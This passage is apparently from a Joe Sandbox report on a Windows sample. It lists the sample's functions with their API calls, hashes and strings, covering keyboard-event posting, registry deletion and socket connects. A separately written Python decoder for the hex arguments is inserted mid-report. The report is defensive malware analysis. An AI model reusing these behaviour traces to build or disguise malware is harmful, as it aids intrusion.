                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007B13B8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007B13D9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: f26a431a2fffe40a962dc39107a5ca58c410a4554c5db10f3f4187c2908e3ec8
                    • Instruction ID: 2572410b1f61a91d9c07ef1d5d459b07085f37cf65b2eb65085b3f56d681e335
                    • Opcode Fuzzy Hash: f26a431a2fffe40a962dc39107a5ca58c410a4554c5db10f3f4187c2908e3ec8
                    • Instruction Fuzzy Hash: 5951D3A0A046D57DFB3287248C65BFABFE96F06300FC88589E1D5878C2E799EC94D750
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: cde44621e81cad0f8017312c1454812c5935abbe2de65e1787ef29e44735efd6
                    • Instruction ID: 1acd9e7510033ccf0a469828b310e6b757d5a3fd38fe5b579e69fd71ac188baa
                    • Opcode Fuzzy Hash: cde44621e81cad0f8017312c1454812c5935abbe2de65e1787ef29e44735efd6
                    • Instruction Fuzzy Hash: 8F416165C20628B6CF10EBB4888EACF77A8AF05750F50C956E51CE3122F738E755C7A9
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007ADAC5
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007ADAFB
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007ADB0C
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007ADB8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: ,,~$DllGetClassObject
                    • API String ID: 753597075-463960871
                    • Opcode ID: e5f36c4e5f23f97eb729c99caede79efbb09d248fe1be38537a78ab9ed0b8fb3
                    • Instruction ID: 4a6f1f6f5cd0ec4484fd1fc4d9cf633d31f7cd440b9b86139ff6a12e8cfcb51d
                    • Opcode Fuzzy Hash: e5f36c4e5f23f97eb729c99caede79efbb09d248fe1be38537a78ab9ed0b8fb3
                    • Instruction Fuzzy Hash: 954194B1601208DFDB25CF54C884A9A7BB9EF89710F1582AEFD069F205D7B9DD40DBA0
                    APIs
                      • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B38D3,?), ref: 007B48C7
                      • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B38D3,?), ref: 007B48E0
                    • lstrcmpiW.KERNEL32(?,?), ref: 007B38F3
                    • _wcscmp.LIBCMT ref: 007B390F
                    • MoveFileW.KERNEL32(?,?), ref: 007B3927
                    • _wcscat.LIBCMT ref: 007B396F
                    • SHFileOperationW.SHELL32(?), ref: 007B39DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: 88a832c5c8efedfd193cf2e54747e4302f518242a0424cd9c6507a47f830579b
                    • Instruction ID: b51c955f2ca7fdc65c56485e9e639007f4312d8744aa05ad0c0dfd63b589a8c2
                    • Opcode Fuzzy Hash: 88a832c5c8efedfd193cf2e54747e4302f518242a0424cd9c6507a47f830579b
                    • Instruction Fuzzy Hash: 8541827240C3449ACB51EF64C485ADFB7E8AF88344F00492EF49AC3152EA7CE68DC752
                    APIs
                    • _memset.LIBCMT ref: 007D7519
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D75C0
                    • IsMenu.USER32(?), ref: 007D75D8
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D7620
                    • DrawMenuBar.USER32 ref: 007D7633
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: a2bd5080baa42566bd7ba328d0e4aadc716f1187c9df78cd984929c7546a6250
                    • Instruction ID: ca5a0917ecdf7620021c71a220de3ccb246a32b5dda7d51c41470d99e71405a8
                    • Opcode Fuzzy Hash: a2bd5080baa42566bd7ba328d0e4aadc716f1187c9df78cd984929c7546a6250
                    • Instruction Fuzzy Hash: E1411775A05609EFDB14DF54E884E9ABBB8FF04314F08812AE95697350E735ED50CF90
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007D125C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D1286
                    • FreeLibrary.KERNEL32(00000000), ref: 007D133D
                      • Part of subcall function 007D122D: RegCloseKey.ADVAPI32(?), ref: 007D12A3
                      • Part of subcall function 007D122D: FreeLibrary.KERNEL32(?), ref: 007D12F5
                      • Part of subcall function 007D122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007D1318
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 007D12E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: 724335ff7666e7808b63998b12cc5bf79a8f503c758d656e0bd69c265fabe591
                    • Instruction ID: 4e0a5b580da4b05b18a9d662243224a8730d4be62428b739d887aeadc9124b90
                    • Opcode Fuzzy Hash: 724335ff7666e7808b63998b12cc5bf79a8f503c758d656e0bd69c265fabe591
                    • Instruction Fuzzy Hash: 82312BB1901109BFDB149B90DC89EFEB7BCEF08300F40416AE512E2251EA79AE459BA4
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007D655B
                    • GetWindowLongW.USER32(011E53C0,000000F0), ref: 007D658E
                    • GetWindowLongW.USER32(011E53C0,000000F0), ref: 007D65C3
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007D65F5
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007D661F
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 007D6630
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007D664A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: b99d46e805df2518f2aec61d19e76d373d2a2da36f35e9e61710c361a99f6297
                    • Instruction ID: caedf365965d6ef8cd78448c29b3946fd62065d467eac9ec6ee1873c1fa77958
                    • Opcode Fuzzy Hash: b99d46e805df2518f2aec61d19e76d373d2a2da36f35e9e61710c361a99f6297
                    • Instruction Fuzzy Hash: 7B310230605210AFDB20CF18EC84F553BF5FB4A310F1881AAF5568B3B6CB69E8A0DB51
                    APIs
                      • Part of subcall function 007C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007C64D9
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C64E8
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C6521
                    • connect.WSOCK32(00000000,?,00000010), ref: 007C652A
                    • WSAGetLastError.WSOCK32 ref: 007C6534
                    • closesocket.WSOCK32(00000000), ref: 007C655D
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C6576
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: e639dfc8ecc55e133bf2ca4450890b443ad43003834908eea3c4e63d07634a85
                    • Instruction ID: 1e38b10d83f8ef84bb4ec43001d7a63ac75b43c21afc80cca6e28f6b9e8d7376
                    • Opcode Fuzzy Hash: e639dfc8ecc55e133bf2ca4450890b443ad43003834908eea3c4e63d07634a85
                    • Instruction Fuzzy Hash: 2D31A431600118EBDB109F24DC89FBE77B9EB44721F04802DFD06A7291DB78AD04CB62
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007AE0FA
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007AE120
                    • SysAllocString.OLEAUT32(00000000), ref: 007AE123
                    • SysAllocString.OLEAUT32 ref: 007AE144
                    • SysFreeString.OLEAUT32 ref: 007AE14D
                    • StringFromGUID2.OLE32(?,?,00000028), ref: 007AE167
                    • SysAllocString.OLEAUT32(?), ref: 007AE175
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                    • String ID:
                    • API String ID: 3761583154-0
                    • Opcode ID: 92dd7230354f0471084c81950217a23d02cfc6842aaed507068ee0e3c2969c39
                    • Instruction ID: 492d5e8b05a9b60799595e561beead48ccc0f6baae7fb4b21a2b612753f8a352
                    • Opcode Fuzzy Hash: 92dd7230354f0471084c81950217a23d02cfc6842aaed507068ee0e3c2969c39
                    • Instruction Fuzzy Hash: FA215335605118AFDB10AFA8DC88DAB77ECEB4A760B50C236F955CB260DA78DC41CF64
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: 547a4c7d6093c7c3aa9829197ee99cd90365fe0a0a712a55f343d906bd121574
                    • Instruction ID: e11f40d85954d8fa646d76c1048b93704782e0b90c95a94cb9db8e87f1f4bc34
                    • Opcode Fuzzy Hash: 547a4c7d6093c7c3aa9829197ee99cd90365fe0a0a712a55f343d906bd121574
                    • Instruction Fuzzy Hash: C4219A72200650A6D634A675DC16FA7739CDF96350F108235F88986182EB5C9D82D2B4
                    APIs
                      • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                      • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                      • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007D78A1
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007D78AE
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007D78B9
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007D78C8
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007D78D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: fb59fa6dc369597c83dbf1479c07128739a5c871ea04d9b091977dcd036f6ce5
                    • Instruction ID: fd6bc40a31d845ede7355fc6835399d7afa5101ea3387e5f8ad3a58894250847
                    • Opcode Fuzzy Hash: fb59fa6dc369597c83dbf1479c07128739a5c871ea04d9b091977dcd036f6ce5
                    • Instruction Fuzzy Hash: 5211B2B2110219BFEF159F60CC85EE77F6DEF08798F018115FA04A2190DB769C21EBA4
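The API lines in the function entries above print every argument as raw hex, which hides what the calls actually do: the two GetKeyboardState/SetKeyboardState functions post 0x101 (WM_KEYUP) and 0x100 (WM_KEYDOWN) for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, the Winsock function calls ioctlsocket with 0x8004667E (FIONBIO) around a non-blocking connect, and the Msctls_Progress32 function drives the control with PBM_SETRANGE/PBM_SETPOS/PBM_SETSTEP. The following decoder is an added example and is not part of the Joe Sandbox report or the analysed sample; the constant tables are taken from the Win32 SDK headers (winuser.h, commctrl.h, winsock.h), and the sample lines are copied from the entries above. One caveat the decoder encodes as an assumption: the GetWindowLongW index arguments printed as 000000F0 and 000000EC are consistent with GWL_STYLE (-16) and GWL_EXSTYLE (-20) with the sign dropped by the report renderer, so the decoder sign-extends byte-sized index values before looking them up.

```python
"""Annotate Joe Sandbox 'APIs' lines with symbolic Win32 names.

Added example, not part of the Joe Sandbox report. Constant values come from
the Win32 SDK headers; SAMPLE_LINES are copied from the function entries above.
"""
import re
from typing import Optional

# Window / control messages that appear in the entries above (winuser.h, commctrl.h).
MESSAGES = {
    0x0030: "WM_SETFONT",
    0x00A1: "WM_NCLBUTTONDOWN",
    0x00B0: "EM_GETSEL",
    0x00F0: "BM_GETCHECK",
    0x00F1: "BM_SETCHECK",
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x0401: "PBM_SETRANGE",     # WM_USER + 1
    0x0402: "PBM_SETPOS",       # WM_USER + 2
    0x0404: "PBM_SETSTEP",      # WM_USER + 4
    0x0409: "PBM_SETBARCOLOR",  # WM_USER + 9
    0x2001: "PBM_SETBKCOLOR",   # CCM_SETBKCOLOR
}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
# GetWindowLong indices are negative; the report prints them as unsigned bytes (assumption).
WINDOW_LONG_INDEX = {-16: "GWL_STYLE", -20: "GWL_EXSTYLE"}
SOCKET_IOCTLS = {0x8004667E: "FIONBIO"}

# "SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007D78C8"
# "_memset.LIBCMT ref: 007CF75C"  (no argument list)
CALL_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)"
)


def parse_args(text: Optional[str]) -> list[Optional[int]]:
    """'00000000,00000100,?' -> [0, 0x100, None]; '?' is a value the report could not resolve."""
    if not text or not text.strip():
        return []
    return [None if a.strip() == "?" else int(a.strip(), 16) for a in text.split(",")]


def window_long_index(value: int) -> Optional[str]:
    """Look up a GWL_* index, also trying the sign-extended byte and dword forms."""
    candidates = [value]
    if 0x80 <= value < 0x100:
        candidates.append(value - 0x100)
    if value >= 0x80000000:
        candidates.append(value - 0x100000000)
    for candidate in candidates:
        if candidate in WINDOW_LONG_INDEX:
            return WINDOW_LONG_INDEX[candidate]
    return None


def decode(line: str) -> dict:
    """Parse one API line and attach symbolic notes for the arguments we recognise."""
    m = CALL_RE.search(line)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    api, args = m["api"], parse_args(m["args"])
    notes: list[str] = []
    if api in ("SendMessageW", "PostMessageW") and len(args) > 1 and args[1] is not None:
        msg = args[1]
        name = MESSAGES.get(msg, f"msg 0x{msg:X}")
        notes.append(name)
        if name in ("WM_KEYDOWN", "WM_KEYUP") and len(args) > 2 and args[2] is not None:
            notes.append(VIRTUAL_KEYS.get(args[2], f"vk 0x{args[2]:X}"))
        if name == "PBM_SETRANGE" and len(args) > 3 and args[3] is not None:
            lo, hi = args[3] & 0xFFFF, args[3] >> 16  # lParam is MAKELPARAM(min, max)
            notes.append(f"range {lo}..{hi}")
        if name == "WM_NCLBUTTONDOWN" and len(args) > 2 and args[2] == 2:
            notes.append("HTCAPTION")  # simulated title-bar click, i.e. a window drag
    elif api in ("GetWindowLongW", "SetWindowLongW") and len(args) > 1 and args[1] is not None:
        notes.append(window_long_index(args[1]) or f"index 0x{args[1]:X}")
    elif api == "ioctlsocket" and len(args) > 1 and args[1] is not None:
        notes.append(SOCKET_IOCTLS.get(args[1], f"cmd 0x{args[1]:X}"))
    elif api == "socket" and args[:3] == [2, 1, 6]:
        notes.append("AF_INET/SOCK_STREAM/IPPROTO_TCP")
    return {"api": api, "module": m["module"], "ref": m["ref"], "args": args, "notes": notes}


# Copied from the report entries above.
SAMPLE_LINES = [
    "PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007B1357",
    "PostMessageW.USER32(?,00000101,0000005B,?), ref: 007B15C8",
    "GetWindowLongW.USER32(011E53C0,000000F0), ref: 007D658E",
    "ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C6521",
    "SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007D78C8",
    "socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007C64D9",
    "_memset.LIBCMT ref: 007CF75C",
]


def annotate(lines: list[str]) -> list[str]:
    """One human-readable row per API line, e.g. 'PostMessageW@007B1357: WM_KEYDOWN, VK_SHIFT'."""
    return [f"{d['api']}@{d['ref']}: " + (", ".join(d["notes"]) or "-") for d in map(decode, lines)]


if __name__ == "__main__":
    for row in annotate(SAMPLE_LINES):
        print(row)
```

Run against the keyboard-state entries, the output shows the same four modifier keys being released with WM_KEYUP in one function and pressed with WM_KEYDOWN in the other, which is the behaviour an analyst should expect from a keystroke-injection routine rather than from a keylogger; the unresolved `?` arguments are kept as `None` so the decoder never invents a window handle or key code the report did not record.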
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00774292,?), ref: 007741E3
                    • GetProcAddress.KERNEL32(00000000), ref: 007741EA
                    • EncodePointer.KERNEL32(00000000), ref: 007741F6
                    • DecodePointer.KERNEL32(00000001,00774292,?), ref: 00774213
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: 1e2352989cd764ac352148f7e687b2ac7524404b2bcdf2354fd31ebb75affd28
                    • Instruction ID: f2aff5a5587cf137f6f821de3767f326d4210f9ce0e7dfb2411e42ce0347d581
                    • Opcode Fuzzy Hash: 1e2352989cd764ac352148f7e687b2ac7524404b2bcdf2354fd31ebb75affd28
                    • Instruction Fuzzy Hash: 89E01AB0692344BEEF206BB1EC0DB543AA8BB24742F51D425F916D50A0DBBE40928F04
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007741B8), ref: 007742B8
                    • GetProcAddress.KERNEL32(00000000), ref: 007742BF
                    • EncodePointer.KERNEL32(00000000), ref: 007742CA
                    • DecodePointer.KERNEL32(007741B8), ref: 007742E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    APIs
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0548
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D0588
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007D05AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007D05D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007D0617
                    • RegCloseKey.ADVAPI32(00000000), ref: 007D0624
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    APIs
                    • GetMenu.USER32(?), ref: 007D5A82
                    • GetMenuItemCount.USER32(00000000), ref: 007D5AB9
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007D5AE1
                    • GetMenuItemID.USER32(?,?), ref: 007D5B50
                    • GetSubMenu.USER32(?,?), ref: 007D5B5E
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 007D5BAF
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 007AF3F7
                    • VariantClear.OLEAUT32(00000013), ref: 007AF469
                    • VariantClear.OLEAUT32(00000000), ref: 007AF4C4
                    • _memmove.LIBCMT ref: 007AF4EE
                    • VariantClear.OLEAUT32(?), ref: 007AF53B
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007AF569
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    APIs
                    • _memset.LIBCMT ref: 007B2747
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2792
                    • IsMenu.USER32(00000000), ref: 007B27B2
                    • CreatePopupMenu.USER32 ref: 007B27E6
